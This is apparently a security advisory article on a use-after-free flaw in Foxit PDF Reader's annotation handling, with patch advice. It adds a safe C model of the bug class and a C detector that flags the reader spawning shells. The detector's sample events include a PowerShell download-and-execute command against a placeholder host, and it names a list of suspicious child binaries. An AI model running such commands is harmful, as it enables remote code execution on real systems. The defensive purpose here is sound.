Foxit PDF Reader Zero-Day CVE-2026-5940 Allows Remote Code Execution via Malicious PDFs
A use-after-free vulnerability in Foxit PDF Reader's Annotation object handling, tracked as CVE-2026-5940, allows remote attackers to execute arbitrary code by tricking users into opening a malicious PDF file.

Foxit PDF Reader users are urged to apply the vendor's security update immediately following the disclosure of a high-severity use-after-free vulnerability in the software's Annotation object handling. Tracked as CVE-2026-5940 and reported through Trend Micro's Zero Day Initiative (ZDI-26-301), the flaw carries a CVSS score of 7.8 and lets an attacker who can get a victim to open a crafted file execute arbitrary code in the context of the reader process.
The vulnerability resides in how Foxit PDF Reader manages Annotation objects: the software fails to validate that an object still exists before performing operations on it, so a reference that outlives the object's deletion is used after the underlying memory has been freed. An attacker exploits this by convincing a target to open a specially crafted PDF file or to visit a malicious web page that delivers such a file. Successful exploitation yields code execution with the privileges of the logged-in user.
Foxit PDF Reader is one of the most widely used PDF viewers globally, particularly in enterprise environments where it is often deployed as a lightweight alternative to Adobe Acrobat. That install base makes the flaw an attractive target for phishing campaigns and drive-by download attacks. The 7.8 (High) score already reflects low attack complexity and the absence of any privilege requirement; the one remaining barrier, user interaction, is exactly what a convincing phishing lure supplies, so in practice the bar for exploitation is low.
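The failure mode described above, modelled as an added example. This is illustrative code written for this article, not Foxit's implementation, and it does not reproduce CVE-2026-5940: a hypothetical viewer keeps Annotation objects in a table, one code path deletes an annotation (for instance a document action removing it) while another still holds a reference, and the unchecked accessor then uses that stale reference. The hardened accessor instead resolves the reference through a lookup that validates the object still exists. A fixed pool with a generation counter stands in for the heap so the stale read is observable without undefined behaviour; with a real allocator the same stale access reads freed, possibly attacker-reallocated, memory. All type and function names are assumptions.

```c
/* Illustrative model of the bug class, not Foxit code. A fixed array
 * replaces the heap so a "freed" slot can be inspected safely. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdbool.h>

#define MAX_ANNOTS 8

typedef struct {
    bool     alive;        /* slot currently holds a live object */
    uint32_t generation;   /* bumped on every free; detects stale handles */
    char     contents[32]; /* annotation text, e.g. a popup note */
} Annot;

/* A handle is a slot index plus the generation at allocation time.
 * Comparing the generation is what "validates the existence of the
 * object" before any operation touches it. */
typedef struct { uint32_t slot; uint32_t generation; } AnnotHandle;

static Annot g_annots[MAX_ANNOTS];   /* zero-initialised: all slots free */

AnnotHandle annot_create(const char *text) {
    for (uint32_t i = 0; i < MAX_ANNOTS; i++) {
        if (!g_annots[i].alive) {
            g_annots[i].alive = true;
            snprintf(g_annots[i].contents, sizeof g_annots[i].contents, "%s", text);
            return (AnnotHandle){ i, g_annots[i].generation };
        }
    }
    return (AnnotHandle){ UINT32_MAX, 0 };   /* pool exhausted */
}

void annot_destroy(AnnotHandle h) {
    Annot *a = &g_annots[h.slot];
    a->alive = false;
    a->generation++;                                 /* invalidates outstanding handles */
    memset(a->contents, 0xdd, sizeof a->contents);   /* poison, like a debug heap would */
}

/* VULNERABLE pattern: trusts the handle and reads the slot directly.
 * After annot_destroy() this returns poisoned data; on a real heap it
 * would read freed memory that an attacker may already have reallocated. */
unsigned char annot_first_byte_unchecked(AnnotHandle h) {
    return (unsigned char)g_annots[h.slot].contents[0];
}

/* HARDENED pattern: every operation goes through a lookup that checks
 * bounds, liveness and generation; a dead or stale object yields NULL. */
Annot *annot_lookup(AnnotHandle h) {
    if (h.slot >= MAX_ANNOTS) return NULL;
    Annot *a = &g_annots[h.slot];
    if (!a->alive || a->generation != h.generation) return NULL;
    return a;
}

/* Returns the first byte of the annotation text, or -1 if the object
 * no longer exists (the caller must handle that instead of proceeding). */
int annot_first_byte_checked(AnnotHandle h) {
    Annot *a = annot_lookup(h);
    return a ? (unsigned char)a->contents[0] : -1;
}

int main(void) {
    AnnotHandle h = annot_create("Review me");
    printf("live:   unchecked=%c checked=%c\n",
           annot_first_byte_unchecked(h), annot_first_byte_checked(h));
    annot_destroy(h);   /* e.g. a document action removed the annotation */
    printf("freed:  unchecked=0x%02x checked=%d\n",
           annot_first_byte_unchecked(h), annot_first_byte_checked(h));
    /* Slot reuse: a new object lands in the same slot with a new
     * generation; the stale handle still fails the checked path. */
    AnnotHandle h2 = annot_create("Attacker controlled");
    printf("reused: stale-checked=%d new-checked=%c\n",
           annot_first_byte_checked(h), annot_first_byte_checked(h2));
    return 0;
}
```

The generation counter is the important part: a liveness flag alone is defeated the moment the slot is reused by a new (attacker-influenced) object, which is exactly the reallocation step a heap-grooming exploit relies on.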
Foxit has released a security update to address CVE-2026-5940. Users can find the patch and additional details on Foxit's security bulletins page at https://www.foxit.com/support/security-bulletins.html. The vulnerability was reported to Foxit on March 30, 2026, and the coordinated public advisory was released on April 27, 2026. The discoverer chose to remain anonymous.
This disclosure follows a pattern of frequent use-after-free vulnerabilities in document readers and office software. Such flaws are dangerous because a use-after-free typically hands the attacker a controllable memory read or write, which is then chained with an information leak to defeat Address Space Layout Randomization (ASLR) and with return-oriented programming to bypass Data Execution Prevention (DEP). Security teams should prioritize patching Foxit PDF Reader across their environments and, until the update is applied, consider blocking PDF downloads from untrusted sources.
Organizations using Foxit PDF Reader should confirm that the installed version matches the fixed release listed in Foxit's bulletin, and review endpoint detection and response (EDR) telemetry for signs of exploitation, such as the reader process spawning shells or script interpreters. Because the exploitation path is straightforward and a patch is available, the period between public disclosure and widespread patching is when attackers are most likely to capitalize on unpatched systems.
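One concrete form of the EDR review suggested above, as an added example that is not part of the advisory: a heuristic scan of process-creation events for the classic symptom of a document reader being exploited, namely the reader process spawning a shell, script host or other living-off-the-land binary. The advisory describes no post-exploitation behaviour, so this rule is an assumption based on how weaponised reader exploits usually stage their payload. The events are constructed for this example in a simplified pipe-separated format (timestamp|parent_image|image|command_line), and the process names are assumptions too: FoxitPDFReader.exe for the current reader binary, FoxitReader.exe for the older name.

```c
/* Added example: Foxit-spawns-a-shell heuristic over constructed
 * process-creation telemetry. Not from the advisory or from Foxit. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 128

/* Constructed sample events; paths are typical, not captured from a host.
 * Format: timestamp|parent_image|image|command_line */
static const char *const SAMPLE_EVENTS[] = {
    "2026-04-28T09:12:01Z|C:\\Windows\\explorer.exe|C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe|\"FoxitPDFReader.exe\" invoice.pdf",
    "2026-04-28T09:12:04Z|C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\"",
    "2026-04-28T09:12:04Z|C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\"",
    "2026-04-28T09:15:30Z|C:\\Program Files\\Foxit Software\\Foxit PDF Reader\\FoxitPDFReader.exe|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|chrome.exe https://example.com/",
    "2026-04-28T09:20:11Z|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami",
};
#define SAMPLE_EVENT_COUNT (sizeof SAMPLE_EVENTS / sizeof SAMPLE_EVENTS[0])

/* Assumed reader process names (lower-case) and the child binaries that
 * a PDF viewer has no legitimate reason to launch. */
static const char *const READER_NAMES[] = { "foxitpdfreader.exe", "foxitreader.exe" };
static const char *const SUSPICIOUS_CHILDREN[] = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
    "msiexec.exe",
};

/* Lower-cased file-name component of a path ('\\' or '/' separated). */
static void basename_lower(const char *path, size_t len, char *out, size_t outsz) {
    const char *start = path;
    for (const char *p = path; p < path + len; p++)
        if (*p == '\\' || *p == '/')
            start = p + 1;
    size_t n = (size_t)(path + len - start);
    if (n >= outsz) n = outsz - 1;
    for (size_t i = 0; i < n; i++)
        out[i] = (char)tolower((unsigned char)start[i]);
    out[n] = '\0';
}

/* Split a pipe-separated line into up to nfields (pointer, length) pairs
 * without copying; returns how many fields were found. */
static size_t split_pipe(const char *line, const char **f, size_t *l, size_t nfields) {
    size_t i = 0;
    const char *p = line;
    while (i < nfields) {
        const char *q = strchr(p, '|');
        f[i] = p;
        l[i] = q ? (size_t)(q - p) : strlen(p);
        i++;
        if (!q) break;
        p = q + 1;
    }
    return i;
}

static int in_list(const char *name, const char *const *list, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (strcmp(name, list[i]) == 0) return 1;
    return 0;
}

/* 1 if the event is "Foxit reader spawned a suspicious child", else 0.
 * Malformed lines are skipped rather than trusted or crashed on. */
int event_is_suspicious(const char *line) {
    const char *f[4];
    size_t l[4];
    if (split_pipe(line, f, l, 4) < 4) return 0;
    char parent[NAME_MAX_LEN], child[NAME_MAX_LEN];
    basename_lower(f[1], l[1], parent, sizeof parent);
    basename_lower(f[2], l[2], child, sizeof child);
    return in_list(parent, READER_NAMES, sizeof READER_NAMES / sizeof *READER_NAMES)
        && in_list(child, SUSPICIOUS_CHILDREN, sizeof SUSPICIOUS_CHILDREN / sizeof *SUSPICIOUS_CHILDREN);
}

/* Scan a batch of events, print each hit, return the number of hits. */
int scan_events(const char *const *events, size_t count) {
    int hits = 0;
    for (size_t i = 0; i < count; i++) {
        if (event_is_suspicious(events[i])) {
            hits++;
            printf("ALERT: %s\n", events[i]);
        }
    }
    return hits;
}

int main(void) {
    int hits = scan_events(SAMPLE_EVENTS, SAMPLE_EVENT_COUNT);
    printf("%d suspicious event(s) out of %zu\n", hits, SAMPLE_EVENT_COUNT);
    return 0;
}
```

The rule matches only on the parent/child pair, so the WINWORD.EXE line is deliberately not flagged; the same logic with a different parent list covers other document readers, and a real deployment would express it as a Sigma or EDR query rather than a standalone scanner.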